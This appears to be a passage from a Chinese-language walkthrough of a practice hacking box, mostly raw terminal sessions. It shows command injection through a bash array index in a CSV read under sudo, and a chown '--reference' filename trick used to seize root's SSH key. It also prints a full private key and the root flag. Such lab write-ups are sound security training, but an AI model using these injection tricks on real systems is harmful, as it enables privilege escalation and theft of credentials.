milou@perlman:\/home\/ze_perlman$ ls -la\ntotal 36\ndrwxr-xr-x 4 ze_perlman ze_perlman 4096 Sep 11 2022 .\ndrwxr-xr-x 5 root root 4096 Jul 23 2022 ..\nlrwxrwxrwx 1 root root 9 Jul 23 2022 .bash_history -> \/dev\/null\n-rw-r--r-- 1 ze_perlman ze_perlman 3526 Jul 26 2022 .bashrc\n-rwxr-xr-x 1 ze_perlman ze_perlman 557 Sep 11 2022 inventory\ndrwxr-xr-x 3 ze_perlman ze_perlman 4096 Jul 26 2022 .local\n-rw-r--rw- 1 ze_perlman ze_perlman 115 Sep 11 2022 perl_store.csv\n-rw-r--r-- 1 ze_perlman ze_perlman 807 Jul 26 2022 .profile\ndrwx------ 2 ze_perlman ze_perlman 4096 Sep 11 2022 .ssh\n-rwx------ 1 ze_perlman ze_perlman 33 Sep 11 2022 user.txt\nmilou@perlman:\/home\/ze_perlman$ cat perl_store.csv \nitem,brand,price,numb\nCPU,AMD,3,550\nGPU,Nvidia,4,1150\nSCREEN,Samsung,4,400\nMOUSE,Razer,6,20\nKEYBOARD,Logitech,95,7\nmilou@perlman:\/home\/ze_perlman$ sudo -u ze_perlman \/bin\/bash \/home\/ze_perlman\/inventory\n\n+IT Inventory+\n\nItem: CPU\nBrand: AMD\nPrice\/Unit: 3$\nQuantity: 550 pcs\nSubtotal: 1650$\n\nItem: GPU\nBrand: Nvidia\nPrice\/Unit: 4$\nQuantity: 1150 pcs\nSubtotal: 4600$\n\nItem: SCREEN\nBrand: Samsung\nPrice\/Unit: 4$\nQuantity: 400 pcs\nSubtotal: 1600$\n\nItem: MOUSE\nBrand: Razer\nPrice\/Unit: 6$\nQuantity: 20 pcs\nSubtotal: 120$\n\nItem: KEYBOARD\nBrand: Logitech\nPrice\/Unit: 95$\nQuantity: 7 pcs\nSubtotal: 665$\n\nTotal cost: 8635$<\/code><\/pre>\n\u8fd9\u5c31\u544a\u8bc9\u6211\u4eec\u8fd9\u4e2acsv\u662f\u53ef\u4ee5\u8fdb\u884c\u81ea\u5b9a\u4e49\u7684\uff01\u5bf9\u4e0a\u8ff0\u811a\u672c\u8fdb\u884c\u5229\u7528\u7684\u65f6\u5019\uff0c\u6d89\u53ca\u5230\u4e86\u4e00\u4e2abash\u7684\u7279\u6027\uff0c\u53ef\u4ee5\u81ea\u52a8\u89e3\u6790\u6570\u7ec4\u5185\u7684\u76f8\u5173\u5b57\u6bcd\uff0c\u5e76\u5c06\u5176\u5f53\u4f5c\u53d8\u91cf\u540d\uff0c\u5982\u4e0b\u5229\u7528\u6240\u793a\uff0c\u5177\u4f53\u5229\u7528\u65b9\u6848\u53ef\u4ee5\u5c1d\u8bd5\u770b\u7fa4\u4e3b\u7684\u89c6\u9891\uff0c\u53c2\u8003\u7b2c\u4e00\u4e2a\uff0c\u8bb2\u7684\u975e\u5e38\u7ec6\u81f4\uff01<\/p>\n
milou@perlman:\/tmp$ sudo -u ze_perlman \/bin\/bash \/home\/ze_perlman\/inventory\n\n+IT Inventory+\n\n\/home\/ze_perlman\/inventory: line 10: uid=1002(ze_perlman) gid=1002(ze_perlman) groups=1002(ze_perlman): syntax error in expression (error token is "(ze_perlman) gid=1002(ze_perlman) groups=1002(ze_perlman)")\n\nTotal cost: $\nmilou@perlman:\/tmp$ cat perl_store.csv \nitem,brand,price,numb\nCPU,AMD,3,a[$(id)]<\/code><\/pre>\nmilou@perlman:\/tmp$ nano perl_store.csv\nmilou@perlman:\/tmp$ cat perl_store.csv \nitem,brand,price,numb\nCPU,AMD,3,a[$(id),$(cat \/home\/ze_perlman\/.ssh\/id_rsa > \/tmp\/flag.txt)]\nmilou@perlman:\/tmp$ sudo -u ze_perlman \/bin\/bash \/home\/ze_perlman\/inventory\n\n+IT Inventory+\n\n\/home\/ze_perlman\/inventory: line 10: uid=1002(ze_perlman) gid=1002(ze_perlman) groups=1002(ze_perlman),: syntax error in expression (error token is "(ze_perlman) gid=1002(ze_perlman) groups=1002(ze_perlman),")\n\nTotal cost: $\nmilou@perlman:\/tmp$ cat flag.txt\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEA200PYB\/uIyQrbCV1qG1NUIz6KlWiFxoOmrAIQKdahaRX0MY28IhS\n7eW4241VG2cPvWturv1yaej9LxItknddx40TvYUZ\/GnLZaVJd1cwBD3WJmuN+wtNyqPf1Y\nOpI05FmI7Kpsh6R9G8Q4F7H6l2SfSiOK6c+Rs3nLsd7651fH7CvHiC4kci7A0FC3GLdbcH\nQR9A02YYalXDfexaeccGz\/1KTN+01\/A6PONeH\/kvmw+kIOUs9cCpxFsV7w7d\/MbsWOaA1h\nyxAtm6zCsz3TxzL6RHe7kf+31O7LcUaNMZ+yHvX+F7DjaDuNdnI8LBYDWgK7St2UbX3N7d\nrAILRVSKFaEd9BX73QF0BSABclWUjSyfb\/jLY2LbJsYB\/nUGE0rTRELIBaw4doH+WvNXhJ\ncdoB15pcsfWGi8fgK9uurQR\/vYciKjPmBIutUccyQ3sW1RKdP3YLT9EdKBrxgIsp0Ttpur\nNVAA5Gm9VspkhseJSm8TXHkBUQ48oLjXrbKvvuDxAAAFkFS8PG5UvDxuAAAAB3NzaC1yc2\nEAAAGBANtND2Af7iMkK2wldahtTVCM+ipVohcaDpqwCECnWoWkV9DGNvCIUu3luNuNVRtn\nD71rbq79cmno\/S8SLZJ3XceNE72FGfxpy2WlSXdXMAQ91iZrjfsLTcqj39WDqSNORZiOyq\nbIekfRvEOBex+pdkn0ojiunPkbN5y7He+udXx+wrx4guJHIuwNBQtxi3W3B0EfQNNmGGpV\nw33sWnnHBs\/9SkzftNfwOjzjXh\/5L5sPpCDlLPXAqcRbFe8O3fzG7FjmgNYcsQLZuswrM9\n08cy+kR3u5H\/t9Tuy3FGjTGfsh71\/hew42g7jXZyPCwWA1oCu0rdlG19ze3awCC0VUihWh\nHfQV+90BdAUgAXJVlI0sn2\/4y2Ni2ybGAf51BhNK00RCyAWsOHaB\/lrzV4SXHaAdeaXLH1\nhovH4Cvbrq0Ef72HIioz5gSLrVHHMkN7FtUSnT92C0\/RHSga8YCLKdE7abqzVQAORpvVbK\nZIbHiUpvE1x5AVEOPKC4162yr77g8QAAAAMBAAEAAAGBALIefvSGOreUMyidrFjmnjtkpf\nQopYS6B06g17Mbuqx9dU3\/ELSBJUpQobrBqnSdWu1xCu9ar8lSEgJfc2BZT3Q7I+N07kxT\n6X5fp7IkwL1RNFT0WteisMZ8H9ueGoywkFp+8B5TCu62bYEu88AdthQPfIspWBoEf0Dvwj\nrgqlA57RWDlFsRiE3NrWFEEg\/EX0IHjnGlpQMJMcVfaYUroF7izaxursYNOmAmFFdH3+DD\n7X1CZygcGkd\/6+rFWoxrTB9oAXszLleRQsDSZWAQsM6oCGprlwvWI+TAOSAwHGR\/LvrhbM\n0XFMDiGBHhv22W\/O4\/CkLQskjKZKE7QWdC6e0Gw5\/QNImNWlv0uycqWedkBF9mIVE6ocUt\nJJQiAfE6ja92TU3pGBH5V5jQu5XIaJkBl96ZolXjqY6z6\/NeW6SAWiWv\/b6WNQOC3MeHfW\n0ZRjQubfIK69VEzfumWqStgzFZ8mS+a5PaxwlefS8u4dcGZECv\/EVOQ3+X623qMnQDIQAA\nAMBKPxKVsbkLh3PR64zwqN3dbEynemSZ3lZMKNeZtYaq8byYtzGjOxfOwSGzFSb\/Wpt1XH\n\/esihGXMIwwkar3vlSDVVLMTRtq+hw4g9zks0pyHlaTBeCK47nawU1jEG+3Jqqzzsmn8ig\nGxZIcv47XWqZz5fN1tQ5AGR3KOGw994UEQqjN+UEZ9FdU6WFiTeuHdDk3+dobkOeNfyJiO\n6ycICISJjaPGo6PIsfRcGr80hermZ0xZn58TjJJ+zWcdSR1V4AAADBAO63qzbUEru94TDb\nGSE2ea9WiZsUePxvhRDDWOP12HqHM6JMwXkL\/40jVpA6uVxUDDSUo7iCLQCIezBZCJP2xB\nbmmVMDRAKoDWCwGpFcyhS\/EZqUv2Ru654GaB1Bc5HCo6v1kHfRYp284NsVhbryk+lNTyLQ\nheJ8xTUPCuzy34GN+KP469MCK6YO\/1NdJf1deB5TUMq5cZzeNp3gqDR4fg\/wb4z1BLy0nR\nyaYILHC\/kNUDYUA2rV87pOrgC+emMiXQAAAMEA6y2IHAPT9yQwFmMv1eWrySa0QbbkTulk\nlI1o+EqlVM2eU5Jv7iiEMKwRLDpkm3p+GKL5wf2\/rYod07goJTO3DEcmJvSq+YiK1LofoR\nZVjqDNowP94PtAKwoPZOC1FrIFyFs8v0YBmz4NapamNnfPOKAWgQJsrbW4Mc\/gIYijb+ja\n4WFc7yIxALDWAIZ+oa\/bcU2aoKyiUcaeMHc0bMBtJI\/NSkMSTjWPKv4Nx7ZEZ6Xdn\/kQ6z\nMiiqfchnsvWvelAAAAFnplX3BlcmxtYW5AcGVybG1hbi5obXYBAgME\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743root<\/h3>\nze_perlman@perlman:~$ sudo -l\nMatching Defaults entries for ze_perlman on perlman:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser ze_perlman may run the following commands on perlman:\n (root) NOPASSWD: \/bin\/bash \/opt\/backup\/bk *\nze_perlman@perlman:~$ cat \/opt\/backup\/bk\n#! \/bin\/bash\n\nvfy=$(<\/opt\/vfy.txt)\n\nbackup(){\n\ncp \/etc\/{passwd,shadow,sudoers} \/opt\/backup\ncp ~\/.ssh\/id_rsa \/opt\/backup\nchmod 700 \/opt\/backup\/*\nchmod 700 \/root\nchown root:root \/usr\/lib\/news\/*\nchown root:root *\nchown -R news:news \/var\/lib\/news\nchown -R www-data:www-data \/var\/www\n}\n\n[[ $1 == "${vfy\/un\/}" ]] && backup\nze_perlman@perlman:~$ cd \/opt\/backup\nze_perlman@perlman:\/opt\/backup$ cat \/opt\/vfy.txt\nundesired-root-2022\nze_perlman@perlman:\/opt\/backup$ sudo \/bin\/bash \/opt\/backup\/bk desired-root-2022\nchmod: changing permissions of '\/opt\/backup\/bk': Operation not permitted\nchown: changing ownership of 'bk': Operation not permitted\nze_perlman@perlman:\/opt\/backup$ ls -la\ntotal 28\ndrwxrwx--- 2 root ze_perlman 4096 Jul 11 11:36 .\nd-wxr-x--- 3 root ze_perlman 4096 Sep 11 2022 ..\n-rwxr-xr-x 1 root root 318 Jul 23 2022 bk\n-rwx------ 1 root root 2602 Jul 11 11:36 id_rsa\n-rwx------ 1 root root 1800 Jul 11 11:36 passwd\n-rwx------ 1 root root 1224 Jul 11 11:36 shadow\n-rwx------ 1 root root 799 Jul 11 11:36 sudoers<\/code><\/pre>\n\u8fd9\u91cc\u7528\u4e86chown\u7684\u4e00\u4e2a\u53c2\u6570\u4ece\u800c\u5229\u7528 *\u8fdb\u884c\u6267\u884c\u547d\u4ee4\uff01<\/p>\n
--reference=RFILE\nuse RFILE's owner and group rather than specifying OWNER:GROUP values. RFILE is always dereferenced.<\/code><\/pre>\n\u4ee5\u4e00\u4e2a\u6587\u4ef6\u7684\u6743\u9650\u8fdb\u884c\u53c2\u8003\uff0c\u6539\u5176\u4ed6\u6587\u4ef6\u6743\u9650\uff0c\u76f8\u5f53\u4e8e\u6309\u7167\u8fd9\u4e2a\u6a21\u677f\u6539\u6743\u9650\u3002\u3002\u3002\u3002\u3002\u800c\u6587\u4ef6\u53c8\u662f\u4f20\u8fdb\u53bb\u6587\u4ef6\u540d\u6267\u884c\u7684\uff0c\u6240\u4ee5\u6211\u4eec\u7684\u6587\u4ef6\u540d\u5c31\u6210\u4e86\u914d\u7f6e\u9879\uff0c\u8fd9\u601d\u8def\u3002\u3002\u3002<\/p>\n
ze_perlman@perlman:\/opt\/backup$ ls -la\ntotal 28\ndrwxrwx--- 2 root ze_perlman 4096 Jul 11 11:36 .\nd-wxr-x--- 3 root ze_perlman 4096 Sep 11 2022 ..\n-rwxr-xr-x 1 root root 318 Jul 23 2022 bk\n-rwx------ 1 root root 2602 Jul 11 11:36 id_rsa\n-rwx------ 1 root root 1800 Jul 11 11:36 passwd\n-rwx------ 1 root root 1224 Jul 11 11:36 shadow\n-rwx------ 1 root root 799 Jul 11 11:36 sudoers\nze_perlman@perlman:\/opt\/backup$ touch whoami\nze_perlman@perlman:\/opt\/backup$ chmod 777 whoami\nze_perlman@perlman:\/opt\/backup$ touch -- '--reference=whoami'\nze_perlman@perlman:\/opt\/backup$ ls -la\ntotal 28\ndrwxrwx--- 2 root ze_perlman 4096 Jul 11 11:41 .\nd-wxr-x--- 3 root ze_perlman 4096 Sep 11 2022 ..\n-rwxr-xr-x 1 root root 318 Jul 23 2022 bk\n-rwx------ 1 root root 2602 Jul 11 11:36 id_rsa\n-rwx------ 1 root root 1800 Jul 11 11:36 passwd\n-rw-r--r-- 1 ze_perlman ze_perlman 0 Jul 11 11:41 '--reference=whoami'\n-rwx------ 1 root root 1224 Jul 11 11:36 shadow\n-rwx------ 1 root root 799 Jul 11 11:36 sudoers\n-rwxrwxrwx 1 ze_perlman ze_perlman 0 Jul 11 11:41 whoami\nze_perlman@perlman:\/opt\/backup$ sudo \/bin\/bash \/opt\/backup\/bk desired-root-2022\nchmod: changing permissions of '\/opt\/backup\/bk': Operation not permitted\nchown: cannot access 'root:root': No such file or directory\nchown: changing ownership of 'bk': Operation not permitted\nze_perlman@perlman:\/opt\/backup$ ls -la\ntotal 28\ndrwxrwx--- 2 root ze_perlman 4096 Jul 11 11:41 .\nd-wxr-x--- 3 root ze_perlman 4096 Sep 11 2022 ..\n-rwxr-xr-x 1 root root 318 Jul 23 2022 bk\n-rwx------ 1 ze_perlman ze_perlman 2602 Jul 11 11:44 id_rsa\n-rwx------ 1 ze_perlman ze_perlman 1800 Jul 11 11:44 passwd\n-rwx------ 1 ze_perlman ze_perlman 0 Jul 11 11:41 '--reference=whoami'\n-rwx------ 1 ze_perlman ze_perlman 1224 Jul 11 11:44 shadow\n-rwx------ 1 ze_perlman ze_perlman 799 Jul 11 11:44 sudoers\n-rwx------ 1 ze_perlman ze_perlman 0 Jul 11 11:41 whoami\nze_perlman@perlman:\/opt\/backup$ ssh root@0.0.0.0 -i id_rsa\nThe authenticity of host '0.0.0.0 (0.0.0.0)' can't be established.\nECDSA key fingerprint is SHA256:BrnX5xrQQLBhNII4axkXA489ckv5pH78f5Bj4aBNpKg.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added '0.0.0.0' (ECDSA) to the list of known hosts.\nLinux perlman.hmv 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Sun Sep 11 12:59:15 2022 from 192.168.0.29\nroot@perlman:~# cat root.txt \n0ca2710be21eabe7ddbf0240557bd210\nroot@perlman:~# cat .local\/\n.clean_tmp share\/ \nroot@perlman:~# cat .local\/.clean_tmp\n#! \/bin\/bash\n\nfind \/tmp\/* -user $USER -exec rm -rf {} \\; 2>\/dev\/null\n\nrm -f \/var\/mail\/{milou,ze_perlman} 2>\/dev\/null<\/code><\/pre>\n\u53c2\u8003<\/h2>\n
https:\/\/www.bilibili.com\/video\/BV19H4y1p7nr\/<\/a><\/p>\n
![\"image-20240711095116673\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746960.png\")
<\/div>![\"image-20240711095147059\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746961.png\")
<\/div><\/p>\n![\"image-20240711103302124\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746962.png\")
<\/div><\/p>\n![\"image-20240711110004465\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746963.png\")
<\/div><\/p>\n![\"image-20240711154410519\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746964.png\")
<\/div><\/p>\n![\"image-20240711155524508\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746965.png\")
<\/div><\/p>\n![\"image-20240711155553018\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746966.png\")
<\/div><\/p>\n![\"image-20240711160116799\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746967.png\")
<\/div><\/p>\n![\"image-20240711162722615\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746968.png\")
<\/div><\/p>\n![\"image-20240711163121920\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746969.png\")
<\/div>![\"image-20240711163139940\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746970.png\")
<\/div><\/p>\n![\"image-20240711164054516\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746971.png\")
<\/div>![\"image-20240711163947580\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746972.png\")
<\/div><\/p>\n![\"image-20240711164024419\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746973.png\")
<\/div><\/p>\n![\"image-20240711165745220\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746974.png\")
<\/div><\/p>\n![\"image-20240711171826286\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746975.png\")
<\/div><\/p>\n![\"image-20240711173347826\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746976.png\")
<\/div><\/p>\n